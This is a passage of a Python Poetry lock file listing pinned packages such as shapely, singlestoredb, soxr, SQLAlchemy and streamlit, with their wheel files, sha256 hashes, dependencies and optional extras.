{file = "shapely-2.0.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:ed1e99702125e7baccf401830a3b94d810d5c70b329b765fe93451fe14cf565b"},
{file = "shapely-2.0.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e7d897e6bdc6bc64f7f65155dbbb30e49acaabbd0d9266b9b4041f87d6e52b3a"},
{file = "shapely-2.0.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0521d76d1e8af01e712db71da9096b484f081e539d4f4a8c97342e7971d5e1b4"},
{file = "shapely-2.0.2-cp37-cp37m-win32.whl", hash = "sha256:5324be299d4c533ecfcfd43424dfd12f9428fd6f12cda38a4316da001d6ef0ea"},
{file = "shapely-2.0.2-cp37-cp37m-win_amd64.whl", hash = "sha256:78128357a0cee573257a0c2c388d4b7bf13cb7dbe5b3fe5d26d45ebbe2a39e25"},
{file = "shapely-2.0.2-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:87dc2be34ac3a3a4a319b963c507ac06682978a5e6c93d71917618b14f13066e"},
{file = "shapely-2.0.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:42997ac806e4583dad51c80a32d38570fd9a3d4778f5e2c98f9090aa7db0fe91"},
{file = "shapely-2.0.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:ccfd5fa10a37e67dbafc601c1ddbcbbfef70d34c3f6b0efc866ddbdb55893a6c"},
{file = "shapely-2.0.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e7c95d3379ae3abb74058938a9fcbc478c6b2e28d20dace38f8b5c587dde90aa"},
{file = "shapely-2.0.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6a21353d28209fb0d8cc083e08ca53c52666e0d8a1f9bbe23b6063967d89ed24"},
{file = "shapely-2.0.2-cp38-cp38-win32.whl", hash = "sha256:03e63a99dfe6bd3beb8d5f41ec2086585bb969991d603f9aeac335ad396a06d4"},
{file = "shapely-2.0.2-cp38-cp38-win_amd64.whl", hash = "sha256:c6fd29fbd9cd76350bd5cc14c49de394a31770aed02d74203e23b928f3d2f1aa"},
{file = "shapely-2.0.2-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:1f217d28ecb48e593beae20a0082a95bd9898d82d14b8fcb497edf6bff9a44d7"},
{file = "shapely-2.0.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:394e5085b49334fd5b94fa89c086edfb39c3ecab7f669e8b2a4298b9d523b3a5"},
{file = "shapely-2.0.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:fd3ad17b64466a033848c26cb5b509625c87d07dcf39a1541461cacdb8f7e91c"},
{file = "shapely-2.0.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d41a116fcad58048d7143ddb01285e1a8780df6dc1f56c3b1e1b7f12ed296651"},
{file = "shapely-2.0.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dea9a0651333cf96ef5bb2035044e3ad6a54f87d90e50fe4c2636debf1b77abc"},
{file = "shapely-2.0.2-cp39-cp39-win32.whl", hash = "sha256:b8eb0a92f7b8c74f9d8fdd1b40d395113f59bd8132ca1348ebcc1f5aece94b96"},
{file = "shapely-2.0.2-cp39-cp39-win_amd64.whl", hash = "sha256:794affd80ca0f2c536fc948a3afa90bd8fb61ebe37fe873483ae818e7f21def4"},
{file = "shapely-2.0.2.tar.gz", hash = "sha256:1713cc04c171baffc5b259ba8531c58acc2a301707b7f021d88a15ed090649e7"},
]
[package.dependencies]
numpy = ">=1.14"
[package.extras]
docs = ["matplotlib", "numpydoc (==1.1.*)", "sphinx", "sphinx-book-theme", "sphinx-remove-toctrees"]
test = ["pytest", "pytest-cov"]
[[package]]
name = "singlestoredb"
version = "0.7.2"
description = "Interface to the SingleStore database and cluster management APIs"
optional = true
python-versions = ">=3.6"
files = [
{file = "singlestoredb-0.7.2-cp36-abi3-macosx_10_9_universal2.whl", hash = "sha256:73f03aa356d5d566444572e385825ac726ca2c811c5c5754c4077cbf28a204c7"},
{file = "singlestoredb-0.7.2-cp36-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:baefc644f255d87a433198a1a5f20f0197f37fb693b0d0a04045c216d10357e8"},
{file = "singlestoredb-0.7.2-cp36-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9d946a7436fdf7ba4c365cc7791be7566b7c5456e3acade75f6d9428f9de4bcb"},
{file = "singlestoredb-0.7.2-cp36-abi3-win32.whl", hash = "sha256:dcfc61a7720044ee444c97485471f22abae500e10dfe99290fa7219347b4bdb5"},
{file = "singlestoredb-0.7.2-cp36-abi3-win_amd64.whl", hash = "sha256:0d961aa12e8dfca837d4006c580c5ba2f33eff4ef447dee1e1bbb7af64b6b1c4"},
{file = "singlestoredb-0.7.2.tar.gz", hash = "sha256:99a0328814217a8517223f47374f6c359798df7f9e025d53bf071811f8fcf56b"},
]
[package.dependencies]
build = "*"
PyJWT = "*"
requests = "*"
sqlparams = "*"
wheel = "*"
[package.extras]
dataframe = ["ibis-singlestoredb"]
dbt = ["dbt-singlestore"]
ed22519 = ["PyNaCl (>=1.4.0)"]
gssapi = ["gssapi"]
ibis = ["ibis-singlestoredb"]
kerberos = ["gssapi"]
rsa = ["cryptography"]
sqlalchemy = ["sqlalchemy-singlestoredb"]
[[package]]
name = "six"
version = "1.16.0"
description = "Python 2 and 3 compatibility utilities"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*"
files = [
{file = "six-1.16.0-py2.py3-none-any.whl", hash = "sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254"},
{file = "six-1.16.0.tar.gz", hash = "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926"},
]
[[package]]
name = "smmap"
version = "5.0.1"
description = "A pure Python implementation of a sliding window memory map manager"
optional = true
python-versions = ">=3.7"
files = [
{file = "smmap-5.0.1-py3-none-any.whl", hash = "sha256:e6d8668fa5f93e706934a62d7b4db19c8d9eb8cf2adbb75ef1b675aa332b69da"},
{file = "smmap-5.0.1.tar.gz", hash = "sha256:dceeb6c0028fdb6734471eb07c0cd2aae706ccaecab45965ee83f11c8d3b1f62"},
]
[[package]]
name = "sniffio"
version = "1.3.0"
description = "Sniff out which async library your code is running under"
optional = false
python-versions = ">=3.7"
files = [
{file = "sniffio-1.3.0-py3-none-any.whl", hash = "sha256:eecefdce1e5bbfb7ad2eeaabf7c1eeb404d7757c379bd1f7e5cce9d8bf425384"},
{file = "sniffio-1.3.0.tar.gz", hash = "sha256:e60305c5e5d314f5389259b7f22aaa33d8f7dee49763119234af3755c55b9101"},
]
[[package]]
name = "socksio"
version = "1.0.0"
description = "Sans-I/O implementation of SOCKS4, SOCKS4A, and SOCKS5."
optional = true
python-versions = ">=3.6"
files = [
{file = "socksio-1.0.0-py3-none-any.whl", hash = "sha256:95dc1f15f9b34e8d7b16f06d74b8ccf48f609af32ab33c608d08761c5dcbb1f3"},
{file = "socksio-1.0.0.tar.gz", hash = "sha256:f88beb3da5b5c38b9890469de67d0cb0f9d494b78b106ca1845f96c10b91c4ac"},
]
[[package]]
name = "soundfile"
version = "0.12.1"
description = "An audio library based on libsndfile, CFFI and NumPy"
optional = true
python-versions = "*"
files = [
{file = "soundfile-0.12.1-py2.py3-none-any.whl", hash = "sha256:828a79c2e75abab5359f780c81dccd4953c45a2c4cd4f05ba3e233ddf984b882"},
{file = "soundfile-0.12.1-py2.py3-none-macosx_10_9_x86_64.whl", hash = "sha256:d922be1563ce17a69582a352a86f28ed8c9f6a8bc951df63476ffc310c064bfa"},
{file = "soundfile-0.12.1-py2.py3-none-macosx_11_0_arm64.whl", hash = "sha256:bceaab5c4febb11ea0554566784bcf4bc2e3977b53946dda2b12804b4fe524a8"},
{file = "soundfile-0.12.1-py2.py3-none-manylinux_2_17_x86_64.whl", hash = "sha256:2dc3685bed7187c072a46ab4ffddd38cef7de9ae5eb05c03df2ad569cf4dacbc"},
{file = "soundfile-0.12.1-py2.py3-none-manylinux_2_31_x86_64.whl", hash = "sha256:074247b771a181859d2bc1f98b5ebf6d5153d2c397b86ee9e29ba602a8dfe2a6"},
{file = "soundfile-0.12.1-py2.py3-none-win32.whl", hash = "sha256:59dfd88c79b48f441bbf6994142a19ab1de3b9bb7c12863402c2bc621e49091a"},
{file = "soundfile-0.12.1-py2.py3-none-win_amd64.whl", hash = "sha256:0d86924c00b62552b650ddd28af426e3ff2d4dc2e9047dae5b3d8452e0a49a77"},
{file = "soundfile-0.12.1.tar.gz", hash = "sha256:e8e1017b2cf1dda767aef19d2fd9ee5ebe07e050d430f77a0a7c66ba08b8cdae"},
]
[package.dependencies]
cffi = ">=1.0"
[package.extras]
numpy = ["numpy"]
[[package]]
name = "soupsieve"
version = "2.5"
description = "A modern CSS selector implementation for Beautiful Soup."
optional = false
python-versions = ">=3.8"
files = [
{file = "soupsieve-2.5-py3-none-any.whl", hash = "sha256:eaa337ff55a1579b6549dc679565eac1e3d000563bcb1c8ab0d0fefbc0c2cdc7"},
{file = "soupsieve-2.5.tar.gz", hash = "sha256:5663d5a7b3bfaeee0bc4372e7fc48f9cff4940b3eec54a6451cc5299f1097690"},
]
[[package]]
name = "soxr"
version = "0.3.7"
description = "High quality, one-dimensional sample-rate conversion library"
optional = true
python-versions = ">=3.6"
files = [
{file = "soxr-0.3.7-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:ac81c4af6a993d5b7c0b466bbac4835bad2b14ec32f342b2c1f83e4cf825e301"},
{file = "soxr-0.3.7-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:8d8a2b3e7f8d0255e2484fb82cb66c86da6fb25b342ef793cceca9ce9a61aa16"},
{file = "soxr-0.3.7-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a0cd6eb6f6bbda2e8de36672cf2f0529ced6e638773150744ef075be0cc4f52c"},
{file = "soxr-0.3.7-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e47d86af35b942c92606fc2d5dfccf3f01309329475571ae2312bbf9edc3a790"},
{file = "soxr-0.3.7-cp310-cp310-win_amd64.whl", hash = "sha256:0e291adfaf9f2a7c4dd180a1b8c280f9beb1c84cb381853e4f4b3434d002ed7f"},
{file = "soxr-0.3.7-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:9e811450f0e91972932bd37ac58e32e44002c2c99db2aa926a9e7ba164545034"},
{file = "soxr-0.3.7-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:9cea63014ce91035074e1228c9340e2b8609faf964e268705fcac5135d05060c"},
{file = "soxr-0.3.7-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bfab27830f6217a15b83445988225c3aeea3bbccfa9399ced291e53e1b05925d"},
{file = "soxr-0.3.7-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:286858e3078d76c11b6d490b66fed3c9bb2a4229759f6be03ceef5c02189bf2c"},
{file = "soxr-0.3.7-cp311-cp311-win_amd64.whl", hash = "sha256:54985ff33292192d2937be80df3e5f3a44d6d53e6835f727d6b99b7cdd3f1611"},
{file = "soxr-0.3.7-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:83c74ef6d61d7dcd81be26f91bee0a420f792f5c1982266f2a80e655f0650a98"},
{file = "soxr-0.3.7-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:cb1e14663a43fe88b8fbc287822a159028366a820abe1a0a9670fb53618cb47b"},
{file = "soxr-0.3.7-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:48acdfbcf870ab54f645b1cfd641bce92c1e3a67346c3bf0f6c0ad2873c1dd35"},
{file = "soxr-0.3.7-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ea663b76f2b0ec1576b8a43aef317aec080abc0a67a4015fcd9f3407039f260a"},
{file = "soxr-0.3.7-cp312-cp312-win_amd64.whl", hash = "sha256:42da0d9eb79c70e5a41917f1b48a032e241a48eb4a1bcea7c80577302ff26974"},
{file = "soxr-0.3.7-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:511c6b2279c8ddd83459d129d69f628f7aae4616ae0a1912963985bd89e35df7"},
{file = "soxr-0.3.7-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a37c518c0b5d70162956d808d6c2e249bae0672e414e0dcfc101e200d8c31f3c"},
{file = "soxr-0.3.7-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:27f2890528d2b2e358938ab660a6b8346802863f5b6b646204d7ff8ab0ca2c66"},
{file = "soxr-0.3.7-cp37-cp37m-win_amd64.whl", hash = "sha256:52467c8c012495544a6dcfcce6b5bcbbc653d24fe9bb33c0b6191acecdb5e297"},
{file = "soxr-0.3.7-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ce12b93747958f2769d6b297e6e27c73d9ad635fe8104ef052bece9c8a322824"},
{file = "soxr-0.3.7-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:1cd65dc7b96ea3cb6c8c48e6020e859680556cc42dd3d4de44779530cce21037"},
{file = "soxr-0.3.7-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d994f1a7690b1b13ab639ea33e0c1d78415b64d88d6df4af705a9443f97b9687"},
{file = "soxr-0.3.7-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e87b58bc9e8c2caa16f07726f666bd043f0a49ca937baa803ce7708003b27833"},
{file = "soxr-0.3.7-cp38-cp38-win_amd64.whl", hash = "sha256:07f4c0c6125ea1482fa187ad5f007216712ee0a93586a9b2f80e79c0bf944cf7"},
{file = "soxr-0.3.7-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:e5267c3ba34d4b873d9bbe3a9e58418b01ae4fd04349a4f944d9943b9ddac0f7"},
{file = "soxr-0.3.7-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:6e39668c250e221db888cf3b290a16fbe10a702d9a4eb604a127f720040de583"},
{file = "soxr-0.3.7-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f8ceeb74e5a55d903cc286d3bd12c2d8f8c85d02894071e9ec92ab405430907c"},
{file = "soxr-0.3.7-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0eed6bf58192dd1bb93becd2444de4d712689713d727b32fd55623ae9aae7df7"},
{file = "soxr-0.3.7-cp39-cp39-win_amd64.whl", hash = "sha256:7221302b4547d02a3f38dd3cd15317ab2b78873c75921db5f4a070848f0c71be"},
{file = "soxr-0.3.7.tar.gz", hash = "sha256:436ddff00c6eb2c75b79c19cfdca7527b1e31b5fad738652f044045ba6258593"},
]
[package.dependencies]
numpy = "*"
[package.extras]
docs = ["linkify-it-py", "myst-parser", "sphinx", "sphinx-book-theme"]
test = ["pytest"]
[[package]]
name = "sqlalchemy"
version = "2.0.22"
description = "Database Abstraction Library"
optional = false
python-versions = ">=3.7"
files = [
{file = "SQLAlchemy-2.0.22-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:f146c61ae128ab43ea3a0955de1af7e1633942c2b2b4985ac51cc292daf33222"},
{file = "SQLAlchemy-2.0.22-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:875de9414393e778b655a3d97d60465eb3fae7c919e88b70cc10b40b9f56042d"},
{file = "SQLAlchemy-2.0.22-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:13790cb42f917c45c9c850b39b9941539ca8ee7917dacf099cc0b569f3d40da7"},
{file = "SQLAlchemy-2.0.22-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e04ab55cf49daf1aeb8c622c54d23fa4bec91cb051a43cc24351ba97e1dd09f5"},
{file = "SQLAlchemy-2.0.22-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:a42c9fa3abcda0dcfad053e49c4f752eef71ecd8c155221e18b99d4224621176"},
{file = "SQLAlchemy-2.0.22-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:14cd3bcbb853379fef2cd01e7c64a5d6f1d005406d877ed9509afb7a05ff40a5"},
{file = "SQLAlchemy-2.0.22-cp310-cp310-win32.whl", hash = "sha256:d143c5a9dada696bcfdb96ba2de4a47d5a89168e71d05a076e88a01386872f97"},
{file = "SQLAlchemy-2.0.22-cp310-cp310-win_amd64.whl", hash = "sha256:ccd87c25e4c8559e1b918d46b4fa90b37f459c9b4566f1dfbce0eb8122571547"},
{file = "SQLAlchemy-2.0.22-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:4f6ff392b27a743c1ad346d215655503cec64405d3b694228b3454878bf21590"},
{file = "SQLAlchemy-2.0.22-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:f776c2c30f0e5f4db45c3ee11a5f2a8d9de68e81eb73ec4237de1e32e04ae81c"},
{file = "SQLAlchemy-2.0.22-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c8f1792d20d2f4e875ce7a113f43c3561ad12b34ff796b84002a256f37ce9437"},
{file = "SQLAlchemy-2.0.22-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d80eeb5189d7d4b1af519fc3f148fe7521b9dfce8f4d6a0820e8f5769b005051"},
{file = "SQLAlchemy-2.0.22-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:69fd9e41cf9368afa034e1c81f3570afb96f30fcd2eb1ef29cb4d9371c6eece2"},
{file = "SQLAlchemy-2.0.22-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:54bcceaf4eebef07dadfde424f5c26b491e4a64e61761dea9459103ecd6ccc95"},
{file = "SQLAlchemy-2.0.22-cp311-cp311-win32.whl", hash = "sha256:7ee7ccf47aa503033b6afd57efbac6b9e05180f492aeed9fcf70752556f95624"},
{file = "SQLAlchemy-2.0.22-cp311-cp311-win_amd64.whl", hash = "sha256:b560f075c151900587ade06706b0c51d04b3277c111151997ea0813455378ae0"},
{file = "SQLAlchemy-2.0.22-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:2c9bac865ee06d27a1533471405ad240a6f5d83195eca481f9fc4a71d8b87df8"},
{file = "SQLAlchemy-2.0.22-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:625b72d77ac8ac23da3b1622e2da88c4aedaee14df47c8432bf8f6495e655de2"},
{file = "SQLAlchemy-2.0.22-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b39a6e21110204a8c08d40ff56a73ba542ec60bab701c36ce721e7990df49fb9"},
{file = "SQLAlchemy-2.0.22-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:53a766cb0b468223cafdf63e2d37f14a4757476157927b09300c8c5832d88560"},
{file = "SQLAlchemy-2.0.22-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:0e1ce8ebd2e040357dde01a3fb7d30d9b5736b3e54a94002641dfd0aa12ae6ce"},
{file = "SQLAlchemy-2.0.22-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:505f503763a767556fa4deae5194b2be056b64ecca72ac65224381a0acab7ebe"},
{file = "SQLAlchemy-2.0.22-cp312-cp312-win32.whl", hash = "sha256:154a32f3c7b00de3d090bc60ec8006a78149e221f1182e3edcf0376016be9396"},
{file = "SQLAlchemy-2.0.22-cp312-cp312-win_amd64.whl", hash = "sha256:129415f89744b05741c6f0b04a84525f37fbabe5dc3774f7edf100e7458c48cd"},
{file = "SQLAlchemy-2.0.22-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:3940677d341f2b685a999bffe7078697b5848a40b5f6952794ffcf3af150c301"},
{file = "SQLAlchemy-2.0.22-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:55914d45a631b81a8a2cb1a54f03eea265cf1783241ac55396ec6d735be14883"},
{file = "SQLAlchemy-2.0.22-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2096d6b018d242a2bcc9e451618166f860bb0304f590d205173d317b69986c95"},
{file = "SQLAlchemy-2.0.22-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:19c6986cf2fb4bc8e0e846f97f4135a8e753b57d2aaaa87c50f9acbe606bd1db"},
{file = "SQLAlchemy-2.0.22-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:6ac28bd6888fe3c81fbe97584eb0b96804bd7032d6100b9701255d9441373ec1"},
{file = "SQLAlchemy-2.0.22-cp37-cp37m-win32.whl", hash = "sha256:cb9a758ad973e795267da334a92dd82bb7555cb36a0960dcabcf724d26299db8"},
{file = "SQLAlchemy-2.0.22-cp37-cp37m-win_amd64.whl", hash = "sha256:40b1206a0d923e73aa54f0a6bd61419a96b914f1cd19900b6c8226899d9742ad"},
{file = "SQLAlchemy-2.0.22-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:3aa1472bf44f61dd27987cd051f1c893b7d3b17238bff8c23fceaef4f1133868"},
{file = "SQLAlchemy-2.0.22-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:56a7e2bb639df9263bf6418231bc2a92a773f57886d371ddb7a869a24919face"},
{file = "SQLAlchemy-2.0.22-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ccca778c0737a773a1ad86b68bda52a71ad5950b25e120b6eb1330f0df54c3d0"},
{file = "SQLAlchemy-2.0.22-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7c6c3e9350f9fb16de5b5e5fbf17b578811a52d71bb784cc5ff71acb7de2a7f9"},
{file = "SQLAlchemy-2.0.22-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:564e9f9e4e6466273dbfab0e0a2e5fe819eec480c57b53a2cdee8e4fdae3ad5f"},
{file = "SQLAlchemy-2.0.22-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:af66001d7b76a3fab0d5e4c1ec9339ac45748bc4a399cbc2baa48c1980d3c1f4"},
{file = "SQLAlchemy-2.0.22-cp38-cp38-win32.whl", hash = "sha256:9e55dff5ec115316dd7a083cdc1a52de63693695aecf72bc53a8e1468ce429e5"},
{file = "SQLAlchemy-2.0.22-cp38-cp38-win_amd64.whl", hash = "sha256:4e869a8ff7ee7a833b74868a0887e8462445ec462432d8cbeff5e85f475186da"},
{file = "SQLAlchemy-2.0.22-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:9886a72c8e6371280cb247c5d32c9c8fa141dc560124348762db8a8b236f8692"},
{file = "SQLAlchemy-2.0.22-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:a571bc8ac092a3175a1d994794a8e7a1f2f651e7c744de24a19b4f740fe95034"},
{file = "SQLAlchemy-2.0.22-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8db5ba8b7da759b727faebc4289a9e6a51edadc7fc32207a30f7c6203a181592"},
{file = "SQLAlchemy-2.0.22-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0b0b3f2686c3f162123adba3cb8b626ed7e9b8433ab528e36ed270b4f70d1cdb"},
{file = "SQLAlchemy-2.0.22-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:0c1fea8c0abcb070ffe15311853abfda4e55bf7dc1d4889497b3403629f3bf00"},
{file = "SQLAlchemy-2.0.22-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:4bb062784f37b2d75fd9b074c8ec360ad5df71f933f927e9e95c50eb8e05323c"},
{file = "SQLAlchemy-2.0.22-cp39-cp39-win32.whl", hash = "sha256:58a3aba1bfb32ae7af68da3f277ed91d9f57620cf7ce651db96636790a78b736"},
{file = "SQLAlchemy-2.0.22-cp39-cp39-win_amd64.whl", hash = "sha256:92e512a6af769e4725fa5b25981ba790335d42c5977e94ded07db7d641490a85"},
{file = "SQLAlchemy-2.0.22-py3-none-any.whl", hash = "sha256:3076740335e4aaadd7deb3fe6dcb96b3015f1613bd190a4e1634e1b99b02ec86"},
{file = "SQLAlchemy-2.0.22.tar.gz", hash = "sha256:5434cc601aa17570d79e5377f5fd45ff92f9379e2abed0be5e8c2fba8d353d2b"},
]
[package.dependencies]
greenlet = {version = "!=0.4.17", markers = "platform_machine == \"aarch64\" or platform_machine == \"ppc64le\" or platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\" or platform_machine == \"win32\" or platform_machine == \"WIN32\""}
typing-extensions = ">=4.2.0"
[package.extras]
aiomysql = ["aiomysql (>=0.2.0)", "greenlet (!=0.4.17)"]
aiosqlite = ["aiosqlite", "greenlet (!=0.4.17)", "typing-extensions (!=3.10.0.1)"]
asyncio = ["greenlet (!=0.4.17)"]
asyncmy = ["asyncmy (>=0.2.3,!=0.2.4,!=0.2.6)", "greenlet (!=0.4.17)"]
mariadb-connector = ["mariadb (>=1.0.1,!=1.1.2,!=1.1.5)"]
mssql = ["pyodbc"]
mssql-pymssql = ["pymssql"]
mssql-pyodbc = ["pyodbc"]
mypy = ["mypy (>=0.910)"]
mysql = ["mysqlclient (>=1.4.0)"]
mysql-connector = ["mysql-connector-python"]
oracle = ["cx-oracle (>=7)"]
oracle-oracledb = ["oracledb (>=1.0.1)"]
postgresql = ["psycopg2 (>=2.7)"]
postgresql-asyncpg = ["asyncpg", "greenlet (!=0.4.17)"]
postgresql-pg8000 = ["pg8000 (>=1.29.1)"]
postgresql-psycopg = ["psycopg (>=3.0.7)"]
postgresql-psycopg2binary = ["psycopg2-binary"]
postgresql-psycopg2cffi = ["psycopg2cffi"]
postgresql-psycopgbinary = ["psycopg[binary] (>=3.0.7)"]
pymysql = ["pymysql"]
sqlcipher = ["sqlcipher3-binary"]
[[package]]
name = "sqlite-vss"
version = "0.1.2"
description = ""
optional = true
python-versions = ">=3.7"
files = [
{file = "sqlite_vss-0.1.2-py3-none-macosx_10_6_x86_64.whl", hash = "sha256:9eefa4207f8b522e32b2747fce44422c773e36710bf807613795218c7ba125f0"},
{file = "sqlite_vss-0.1.2-py3-none-macosx_11_0_arm64.whl", hash = "sha256:84994eaf7fe700218b258422358c4536a6aca39b96026c308b28630967f954c4"},
{file = "sqlite_vss-0.1.2-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux1_x86_64.whl", hash = "sha256:e44f03bc4cb214bb77b206519abfb623e3e4795967a569218e288927a7715806"},
]
[package.extras]
test = ["pytest"]
[[package]]
name = "sqlitedict"
version = "2.1.0"
description = "Persistent dict in Python, backed up by sqlite3 and pickle, multithread-safe."
optional = true
python-versions = "*"
files = [
{file = "sqlitedict-2.1.0.tar.gz", hash = "sha256:03d9cfb96d602996f1d4c2db2856f1224b96a9c431bdd16e78032a72940f9e8c"},
]
[[package]]
name = "sqlparams"
version = "5.1.0"
description = "Convert between various DB API 2.0 parameter styles."
optional = true
python-versions = ">=3.7"
files = [
{file = "sqlparams-5.1.0-py3-none-any.whl", hash = "sha256:ee4ef620a5197535e5ebb9217e2f453f08b044634b3d890f3d6701e4f838c85c"},
{file = "sqlparams-5.1.0.tar.gz", hash = "sha256:1abe87a0684567265b2b86f5a482d5c37db237c0268d4c81774ffedce4300199"},
]
[[package]]
name = "stack-data"
version = "0.6.3"
description = "Extract data from python stack frames and tracebacks for informative displays"
optional = false
python-versions = "*"
files = [
{file = "stack_data-0.6.3-py3-none-any.whl", hash = "sha256:d5558e0c25a4cb0853cddad3d77da9891a08cb85dd9f9f91b9f8cd66e511e695"},
{file = "stack_data-0.6.3.tar.gz", hash = "sha256:836a778de4fec4dcd1dcd89ed8abff8a221f58308462e1c4aa2a3cf30148f0b9"},
]
[package.dependencies]
asttokens = ">=2.1.0"
executing = ">=1.2.0"
pure-eval = "*"
[package.extras]
tests = ["cython", "littleutils", "pygments", "pytest", "typeguard"]
[[package]]
name = "streamlit"
version = "1.22.0"
description = "A faster way to build and share data apps"
optional = true
python-versions = ">=3.7, !=3.9.7"
files = [
{file = "streamlit-1.22.0-py2.py3-none-any.whl", hash = "sha256:520dd9b9e6efb559b5a9a22feadb48b1e6f0340ec83da3514810059fdecd4167"},
{file = "streamlit-1.22.0.tar.gz", hash = "sha256:5bef9bf8deef32814d9565c9df48331e6357eb0b90dabc3ec4f53c44fb34fc73"},
]
[package.dependencies]
altair = ">=3.2.0,<5"
blinker = ">=1.0.0"
cachetools = ">=4.0"
click = ">=7.0"
gitpython = "!=3.1.19"
importlib-metadata = ">=1.4"
numpy = "*"
packaging = ">=14.1"
pandas = ">=0.25,<3"
pillow = ">=6.2.0"
protobuf = ">=3.12,<4"
pyarrow = ">=4.0"
pydeck = ">=0.1.dev5"
pympler = ">=0.9"
python-dateutil = "*"
requests = ">=2.4"
rich = ">=10.11.0"
tenacity = ">=8.0.0,<9"
toml = "*"
tornado = ">=6.0.3"
typing-extensions = ">=3.10.0.0"
tzlocal = ">=1.1"
validators = ">=0.2"
watchdog = {version = "*", markers = "platform_system != \"Darwin\""}
[package.extras]
snowflake = ["snowflake-snowpark-python"]
[[package]]
name = "stringcase"
